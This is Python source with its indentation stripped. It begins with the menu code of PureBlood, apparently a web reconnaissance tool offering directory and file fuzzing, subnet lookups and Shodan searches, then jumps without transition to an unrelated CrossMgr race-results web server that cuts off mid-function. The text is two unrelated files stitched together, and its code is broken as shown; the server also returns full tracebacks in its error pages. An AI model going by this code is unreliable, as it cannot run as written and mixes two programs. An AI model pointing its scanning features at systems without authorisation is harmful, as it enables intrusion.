web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse IP Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_ip_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_ip_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 12:
if sys.version_info[0] == 3:
subnet_input = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subnet_input = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subnet_lookup = cweb_pentest.subnet_lookup(subnet_input)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (wp_subnet_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 13:
try:
wp_links_extract = cweb_pentest.links_extract(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Links Extract Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_links_extract)
web_pentest_outputfile.write('\n' + wp_links_extract)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 14:
if sys.version_info[0] == 3:
directory_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
directory_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_directory_fuzz1, wp_directory_fuzz2, wp_directory_fuzz3 = cweb_pentest.directory_fuzz(url, directory_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Directory Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_directory_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_directory_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 403:\n')
print ('[+] Response 403')
for i in wp_directory_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 15:
if sys.version_info[0] == 3:
file_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
file_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_file_fuzz1, wp_file_fuzz2, wp_file_fuzz3 = cweb_pentest.file_fuzz(url, file_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] File Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_file_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_file_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 403:\n')
print ('[+] Response 403')
for i in wp_file_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 16:
if sys.version_info[0] == 3:
shodan_search_query = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename: shodan_search_output_filename = shodan_search_output_filename + '.txt'
if sys.version_info[0] == 2:
shodan_search_query = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename: shodan_search_output_filename = shodan_search_output_filename + '.txt'
shodan_search_output = open('outputs/web_pentest/shodan/' + shodan_search_output_filename, 'a+')
shodan_search_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_search = cweb_pentest.shodan_search(shodan_search_query, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('------------------------------.\n{1}[{2}#{1}] {3}- {4}Results Found: {5}|\n------------------------------.{0}'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
shodan_search_output.write('\n------------------------------.\n[#] - Results Found: {5}|\n------------------------------.\n'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
for i in wp_shodan_search['matches']:
try:
print ("""{6}[{7}#{6}] {8}- {9}Timestamp:{10} {0}
{6}[{7}+{6}] {8}- {9}IP:{10} {1}
{6}[{7}+{6}] {8}- {9}Port:{10} {2}
{6}[{7}+{6}] {8}- {9}OS:{10} {3}
{6}[{7}+{6}] {8}- {9}Hostnames:{10} {4}
{6}[{7}+{6}] {8}- {9}Data:{10}
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
shodan_search_output.write("""[#] - Timestamp: {0}
[+] - IP: {1}
[+] - Port: {2}
[+] - OS: {3}
[+] - Hostnames: {4}
[+] - Data:
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
except:
pass
shodan_search_output.write('\n\n')
shodan_search_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_search_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 17:
if sys.version_info[0] == 3:
shodan_host = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename: shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
if sys.version_info[0] == 2:
shodan_host = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename: shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
shodan_host_lookup_output = open('outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename, 'a+')
shodan_host_lookup_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_host_lookup = cweb_pentest.shodan_host_lookup(shodan_host, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ("""--------------------------.\n{1}[{2}#{1}] {3}- {4}General Information:{0}|\n--------------------------.
{1}[{2}#{1}] {3}- {4}IP:{0} {5}
{1}[{2}#{1}] {3}- {4}Ports:{0} {6}
{1}[{2}#{1}] {3}- {4}Tags:{0} {7}
{1}[{2}#{1}] {3}- {4}City:{0} {8}
{1}[{2}#{1}] {3}- {4}Country:{0} {9}
{1}[{2}#{1}] {3}- {4}Organization:{0} {10}
{1}[{2}#{1}] {3}- {4}ISP:{0} {11}
{1}[{2}#{1}] {3}- {4}Last Update:{0} {12}
{1}[{2}#{1}] {3}- {4}Hostnames:{0} {13}
{1}[{2}#{1}] {3}- {4}ASN:{0} {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
shodan_host_lookup_output.write("""--------------------------.\n[#] - General Information:|\n--------------------------.
[#] - IP: {5}
[#] - Ports: {6}
[#] - Tags: {7}
[#] - City: {8}
[#] - Country: {9}
[#] - Organization: {10}
[#] - ISP: {11}
[#] - Last Update: {12}
[#] - Hostnames: {13}
[#] - ASN: {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
print ('------------------------.\n{1}[{2}#{1}] {3}- {4}Services / Banner:|\n------------------------.{0}'.format(reset, blue, green, yellow, cyan))
shodan_host_lookup_output.write('\n------------------------.\n[#] - Services / Banner:|\n------------------------.\n'.format(reset, blue, green, yellow, cyan))
for i in wp_shodan_host_lookup['data']:
print ("""{1}[{2}#{1}] {3}- {4}Timestamp:{0} {5}
{1}[{2}+{1}] {3}- {4}Port:{0} {6}
{1}[{2}+{1}] {3}- {4}Transport:{0} {7}
{1}[{2}+{1}] {3}- {4}Data:{0}
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write("""[#] - Timestamp: {5}
[+] - Port: {6}
[+] - Transport: {7}
[+] - Data:
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write('\n\n')
shodan_host_lookup_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 90:
main()
elif choice == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" at the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if '://' in target:
ohostname = target.replace('https://', '').replace('http://', '')
else:
ohostname = target
web_pentest_output = ohostname + '-' + month + mday + '.txt'
web_pentest_outputfile = open('outputs/web_pentest/' + web_pentest_output, 'a+')
web_pentest_outputfile.write('\n\n\n[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
set_target(target, 1)
elif choice == 99:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
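# Top-level menu dispatching to the Web Pentest, Web Application Attack and Generator sections.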
def main():
print ("""{3}[ {5}PureBlood Menu {3}]
{2}01{3}) {5}Web Pentest / Information Gathering
{2}02{3}) {5}Web Application Attack
{2}03{3}) {5}Generator
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if choice == 1:
web_pentest()
elif choice == 2:
web_application_attack()
elif choice == 3:
generator()
elif choice == 99:
print ('{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
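# Entry point: create the output directories if needed, then show the banner and the main menu.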
if __name__ == '__main__':
if not os.path.exists('outputs'):
os.mkdir('outputs')
else:
pass
if not os.path.exists('outputs/generator'):
os.mkdir('outputs/generator')
else:
pass
if not os.path.exists('outputs/web_pentest'):
os.mkdir('outputs/web_pentest')
else:
pass
if not os.path.exists('outputs/web_pentest/shodan'):
os.mkdir('outputs/web_pentest/shodan')
else:
pass
if not os.path.exists('outputs/web_application_attack'):
os.mkdir('outputs/web_application_attack')
else:
pass
if not os.path.exists('external'):
os.mkdir('external')
else:
pass
clear()
banner()
main()
WebServer.py
import os
import io
import re
import six
import sys
import gzip
import glob
import time
import json
import base64
urllib = six.moves.urllib
from six.moves.urllib.parse import quote
from six.moves.urllib.request import url2pathname
import socket
import datetime
import traceback
import threading
from six.moves.queue import Queue, Empty
try:
# Python 2.x
from SocketServer import ThreadingMixIn
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
except ImportError:
# Python 3.x
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler, HTTPServer
from qrcode import QRCode
from tornado.template import Template
from ParseHtmlPayload import ParseHtmlPayload
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
StringIO = six.StringIO
import Utils
import Model
from GetResults import GetResultsRAM, GetResultsBaseline, GetRaceName
from Synchronizer import syncfunc
from ThreadPoolMixIn import ThreadPoolMixIn
class CrossMgrServer(ThreadPoolMixIn, HTTPServer):
pass
now = datetime.datetime.now
reCrossMgrHtml = re.compile( r'^\d\d\d\d-\d\d-\d\d-.*\.html$' )
futureDate = datetime.datetime( now().year+20, 1, 1 )
with open( os.path.join(Utils.getImageFolder(), 'CrossMgr.ico'), 'rb' ) as f:
favicon = f.read()
def readBase64( fname ):
with open( os.path.join(Utils.getImageFolder(), fname), 'rb' ) as f:
return "data:image/png;base64," + base64.b64encode( f.read() ).decode('ascii')
with open( os.path.join(Utils.getImageFolder(), 'CrossMgrHeader.png'), 'rb' ) as f:
DefaultLogoSrc = readBase64('CrossMgrHeader.png')
icons = {
'QRCodeIconSrc': readBase64('QRCodeIcon.png'),
'CountdownIconSrc': readBase64('countdown.png'),
'StartListIconSrc': readBase64('tt_start_list.png'),
'LapCounterIconSrc': readBase64('lapcounter.png'),
'ResultsCurrentIconSrc': readBase64('results_current.png'),
'ResultsPreviousIconSrc': readBase64('results_previous.png'),
'AnnouncerIconSrc': readBase64('announcer.png'),
}
with open(os.path.join(Utils.getHtmlFolder(), 'Index.html')) as f:
indexTemplate = Template( f.read() )
PORT_NUMBER = 8765
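# Compress page content with gzip so responses can be served with Content-Encoding: gzip.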
def gzipEncode( content ):
if six.PY2:
out = StringIO()
with gzip.GzipFile( fileobj=out, mode='w', compresslevel=5 ) as f:
f.write( content.encode(encoding='utf-8') )
return out.getvalue()
else:
out = io.BytesIO()
with gzip.GzipFile( fileobj=out, mode='wb', compresslevel=5 ) as f:
f.write( content.encode() if not isinstance(content, bytes) else content )
return out.getbuffer()
def validContent( content ):
return content.strip().endswith( '</html>' )
@syncfunc
def getCurrentHtml():
return Model.getCurrentHtml()
@syncfunc
def getCurrentTTCountdownHtml():
return Model.getCurrentTTCountdownHtml()
@syncfunc
def getCurrentTTStartListHtml():
return Model.getCurrentTTStartListHtml()
with open(os.path.join(Utils.getHtmlFolder(), 'LapCounter.html')) as f:
lapCounterTemplate = f.read().encode()
def getLapCounterHtml():
return lapCounterTemplate
with open(os.path.join(Utils.getHtmlFolder(), 'Announcer.html')) as f:
announcerHTML = f.read().encode()
def getAnnouncerHtml():
return announcerHTML
def coreName( fname ):
return os.path.splitext(os.path.basename(fname).split('?')[0])[0].replace('_TTCountdown','').replace('_TTStartList','').strip('-')
class Generic( object ):
def __init__( self, **kwargs ):
self.__dict__.update( kwargs )
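# Cache of published race HTML pages, keyed by file name; entries are refreshed from the live race or from files on disk as they change.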
class ContentBuffer( object ):
Unchanged = 0
Changed = 1
ReadError = 2
ContentError = 3
def __init__( self ):
self.fileCache = {}
self.fnameRace = None
self.dirRace = None
self.lock = threading.Lock()
def _updateFile( self, fname, forceUpdate=False ):
if not self.fnameRace:
return None
if '_TTCountdown' in fname: # Force update the countdown so we get a valid timestamp.
forceUpdate = True
fnameBase = os.path.basename(fname).split('?')[0]
race = Model.race
if 'CoursePreview.html' in fnameBase or not reCrossMgrHtml.match(fnameBase):
return None
cache = self.fileCache.get( fname, {} )
fnameFull = os.path.join( self.dirRace, fname )
if race and self.fnameRace and coreName(self.fnameRace) == coreName(fnameFull):
if forceUpdate or race.lastChangedTime > cache.get('mtime',0.0):
if '_TTCountdown' in fname:
content = getCurrentTTCountdownHtml()
elif '_TTStartList' in fname:
content = getCurrentTTStartListHtml()
else:
content = getCurrentHtml()
if content:
cache['mtime'] = time.time()
result = ParseHtmlPayload( content=content )
cache['payload'] = result['payload'] if result['success'] else {}
if six.PY2:
cache['content'] = content
cache['gzip_content'] = gzipEncode( content )
else:
cache['content'] = content.encode() if not isinstance(content, bytes) else content
cache['gzip_content'] = gzipEncode( content )
cache['status'] = self.Changed
self.fileCache[fname] = cache
return cache
try:
mtime = os.path.getmtime( fnameFull )
except Exception as e:
self.fileCache.pop( fname, None )
return None
if not forceUpdate and (cache.get('mtime',None) == mtime and cache.get('content',None)):
cache['status'] = self.Unchanged
return cache
cache['status'] = self.Changed
try:
with open(fnameFull) as f:
content = f.read()
except Exception as e:
cache['status'] = self.ReadError
return cache
if not validContent(content):
cache['status'] = self.ContentError
content = ''
cache['mtime'] = mtime
result = ParseHtmlPayload( content=content )
cache['payload'] = result['payload'] if result['success'] else {}
cache['content'] = content.encode('utf-8')
cache['gzip_content'] = gzipEncode( cache['content'] )
self.fileCache[fname] = cache
return cache
def reset( self ):
if self.fnameRace:
self.setFNameRace( self.fnameRace )
def setFNameRace( self, fnameRace ):
with self.lock:
self.fnameRace = fnameRace
self.dirRace = os.path.dirname( fnameRace )
coreNameRace = coreName( os.path.basename(fnameRace) )
self.fileCache = {}
self._updateFile( os.path.splitext(os.path.basename(fnameRace))[0] + '.html' )
for f in glob.glob( os.path.join(self.dirRace, '*.html') ):
self._updateFile( os.path.basename(f), coreName(os.path.basename(f)) == coreNameRace )
def _getFiles( self ):
return [fname for fname, cache in sorted(
six.iteritems(self.fileCache),
key=lambda x: (x[1]['payload'].get('raceScheduledStart',futureDate), x[0])
) if not (fname.endswith('_TTCountdown.html') or fname.endswith('_TTStartList.html'))]
def _getCache( self, fname, checkForUpdate=True ):
if checkForUpdate:
cache = self._updateFile( fname )
else:
try:
cache = self.fileCache[fname]
except KeyError:
cache = self._updateFile( fname, True )
return cache
def getContent( self, fname, checkForUpdate=True ):
with self.lock:
cache = self._getCache( fname, checkForUpdate )
if cache:
return cache.get('content', ''), cache.get('gzip_content', None)
return '', None
def getIndexInfo( self ):
with self.lock:
race = Model.race
if not race:
return {}
result = {
'logoSrc': race.headerImage or DefaultLogoSrc,
'organizer': race.organizer.encode(),
}
files = self._getFiles()
info = []
for fname in files:
cache = self._getCache( fname, False )
if not cache:
continue
payload = cache.get('payload', {})
fnameShow = os.path.splitext(os.path.basename(fname))[0].strip('-')
if fnameShow != 'Simulation':
fnameShow = fnameShow[11:]
g = Generic(
raceScheduledStart = payload.get('raceScheduledStart',None),
name = fnameShow,
categories = [
(
c['name'].encode(),
quote(six.text_type(c['name']).encode()),
c.get( 'starters', 0 ),
c.get( 'finishers', 0 ),
)
for c in payload.get('catDetails',[]) if c['name'] != 'All'],
url = urllib.request.pathname2url(fname),
isTimeTrial = payload.get('isTimeTrial',False),
raceIsRunning = payload.get('raceIsRunning',False),
raceIsFinished = payload.get('raceIsFinished',False),
)
if g.isTimeTrial:
g.urlTTCountdown = urllib.request.pathname2url(os.path.splitext(fname)[0] + '_TTCountdown.html')
g.urlTTStartList = urllib.request.pathname2url(os.path.splitext(fname)[0] + '_TTStartList.html')
else:
g.urlLapCounter = urllib.request.pathname2url('LapCounter.html')
info.append( g )
result['info'] = info
return result
#-----------------------------------------------------------------------
contentBuffer = ContentBuffer()
DEFAULT_HOST = None
def SetFileName( fname ):
if fname.endswith( '.cmn' ):
fname = os.path.splitext(fname)[0] + '.html'
q.put( {'cmd':'fileName', 'fileName':fname} )
def GetPreviousFileName():
file = None
try:
fnameCur = os.path.splitext(Model.race.getFileName())[0] + '.html'
except:
fnameCur = None
files = contentBuffer._getFiles()
try:
file = files[files.index(fnameCur)-1]
except:
pass
if file is None:
try:
file = files[-1]
except:
pass
return file
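# Build a standalone HTML page that draws a QR code linking to the shared results page.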
def getQRCodePage( urlPage ):
qr = QRCode()
qr.add_data( urlPage )
qr.make()
qrcode = '["' + '",\n"'.join(
[''.join( '1' if v else '0' for v in qr.modules[row] ) for row in six.moves.range(qr.modules_count)]
) + '"]'
result = StringIO()
def w( s ):
result.write( s )
result.write( '\n' )
w( '<html>' )
w( '<head>' )
w( '''<style type="text/css">
body {
font-family: sans-serif;
text-align: center;
}
</style>''' )
w( '''<script>
function Draw() {
var qrcode={qrcode};
var c = document.getElementById("idqrcode");
var ctx = c.getContext("2d");
ctx.fillStyle = '#000';
var s = Math.floor( c.width / qrcode.length );
for( var y = 0; y < qrcode.length; ++y ) {
var row = qrcode[y];
for( var x = 0; x < row.length; ++x ) {
if( row.charAt(x) == '1' )
ctx.fillRect( x*s, y*s, s, s );
}
}
}
'''.replace('{qrcode}', qrcode) )
w( '</script>' )
w( '</head>' )
w( '<body onload="Draw();">' )
w( '<h1 style="margin-top: 32px;">Share Race Results</h1>' )
w( '<canvas id="idqrcode" width="360" height="360"></canvas>' )
w( '<h2>Scan the QRCode.<br/>Follow it to the Race Results page.</h2>' )
w( '<h2>{}</h2>'.format(urlPage) )
w( 'Powered by <a href="http://www.sites.google.com/site/crossmgrsoftware">CrossMgr</a>.' )
w( '</body>' )
w( '</html>' )
return result.getvalue().encode()
def getIndexPage( share=True ):
info = contentBuffer.getIndexInfo()
if not info:
return ''
info['share'] = share
info.update( icons )
return indexTemplate.generate( **info )
#---------------------------------------------------------------------------
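# Write index.html next to the race file, but only when the generated content differs from what is already on disk.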
def WriteHtmlIndexPage():
fname = os.path.join( os.path.dirname(Utils.getFileName()), 'index.html' )
try:
with open(fname, 'rb') as f: # Read as bytes as the index page is already utf-8 encoded.
previousContent = f.read()
except Exception as e:
previousContent = ''
content = getIndexPage(share=False)
if content != previousContent:
with open(fname, 'wb') as f: # Write as bytes as the index page is already utf-8 encoded.
f.write( content )
return fname
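# HTTP GET handler serving the index, favicon, lap counter, announcer, QR-code, server timestamp and cached race result pages, with optional gzip encoding.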
class CrossMgrHandler( BaseHTTPRequestHandler ):
html_content = 'text/html; charset=utf-8'
json_content = 'application/json'
reLapCounterHtml = re.compile( r'^\/LapCounter[0-9A-Z-]*\.html$' )
def do_GET(self):
up = urllib.parse.urlparse( self.path )
content, gzip_content = None, None
try:
if up.path=='/':
content = getIndexPage()
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/favicon.ico':
content = favicon
content_type = 'image/x-icon'
assert isinstance( content, bytes )
elif self.reLapCounterHtml.match( up.path ):
content = getLapCounterHtml()
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/Announcer.html':
content = getAnnouncerHtml()
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/qrcode.html':
urlPage = GetCrossMgrHomePage()
content = getQRCodePage( urlPage )
content_type = self.html_content
assert isinstance( content, bytes )
elif up.path=='/servertimestamp.html':
content = Utils.ToJson( {
'servertime':time.time()*1000.0,
'requesttimestamp':float(up.query),
}
).encode()
content_type = self.json_content
assert isinstance( content, bytes )
else:
file = None
if up.path == '/CurrentResults.html':
try:
file = os.path.splitext(Model.race.getFileName())[0] + '.html'
except:
pass
elif up.path == '/PreviousResults.html':
file = GetPreviousFileName()
if file is None:
file = url2pathname(os.path.basename(up.path))
content, gzip_content = contentBuffer.getContent( file )
content_type = self.html_content
assert isinstance( content, bytes )
except Exception as e:
self.send_error(404,'File Not Found: {} {}\n{}'.format(self.path, e, traceback.format_exc()))
return
self.send_response( 200 )
self.send_header('Content-Type',content_type)
if content_type == self.html_content:
if gzip_content and 'Accept-Encoding' in self.headers and 'gzip' in self.headers['Accept-Encoding']:
content = gzip_content
self.send_header( 'Content-Encoding', 'gzip' )
self.send_header( 'Cache-Control', 'no-cache, no-store, must-revalidate' )
self.send_header( 'Pragma', 'no-cache' )
self.send_header( 'Expires', '0' )
self.send_header( 'Content-Length', len(content) )
self.end_headers()
self.wfile.write( content )
def log_message(self, format, *args):
return
#--------------------------------------------------------------------------
def GetCrossMgrHomePage( ip=None ):
if ip is None:
ip = not sys.platform.lower().startswith('win')
ip = True
if ip:
hostname = DEFAULT_HOST
else:
hostname = socket.gethostname()
try:
socket.gethostbyname( hostname )
except:
hostname = DEFAULT_HOST
return 'http://{}:{}'.format(hostname, PORT_NUMBER)
server = None
def WebServer():
global server
while 1:
try:
server = CrossMgrServer(('', PORT_NUMBER), CrossMgrHandler)
server.init_thread_pool()
server.serve_forever( poll_interval = 2 )
except Exception as e:
server = None
time.sleep( 5 )
def queueListener( q ):
global DEFAULT_HOST, server
DEFAULT_HOST = Utils.GetDefaultHost()
keepGoing = True
while keepGoing:
message = q.get()
cmd = message.get('cmd', None)
if cmd == 'fileName':
DEFAULT_HOST = Utils.GetDefaultHost()
contentBuffer.setFNameRace( message['fileName'] )
elif cmd == 'exit':
keepGoing = False
q.task_done()
if server:
server.shutdown()
server = None
q = Queue()
qThread = threading.Thread( target=queueListener, name='queueListener', args=(q,) )
qThread.daemon = True
qThread.start()
webThread = threading.Thread( target=WebServer, name='WebServer' )
webThread.daemon = True
webThread.start()
from websocket_server import WebsocketServer
#-------------------------------------------------------------------
def message_received(client, server, message):
msg = json.loads( message )
if msg['cmd'] == 'send_baseline' and (msg['raceName'] == 'CurrentResults' or msg['raceName'] == GetRaceName()):
server.send_message( client, json.dumps(GetResultsBaseline()) )
wsServer = None
def WsServerLaunch():
global wsServer
